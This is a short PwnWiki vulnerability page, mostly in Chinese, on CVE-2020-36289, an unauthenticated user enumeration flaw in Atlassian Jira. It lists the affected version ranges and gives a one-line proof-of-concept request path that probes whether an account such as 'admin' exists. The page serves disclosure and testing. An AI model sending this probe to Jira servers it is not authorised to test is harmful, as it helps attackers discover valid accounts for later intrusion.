CVE-2020-36289 Atlassian Jira Unauth 用戶枚舉漏洞

From PwnWiki
Revision as of 20:17, 11 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1 </pre> ==POC== <pre> /secure/QueryComponentRender...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎español • ‎עברית • ‎中文(中国大陆)‎

影響版本

Jira < 8.5.13
8.6.0 ≤ Jira < 8.13.5
8.14.0 ≤ Jira < 8.15.1

POC

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

截圖

Twitter E3k2 J4VIAAWR 6.jpg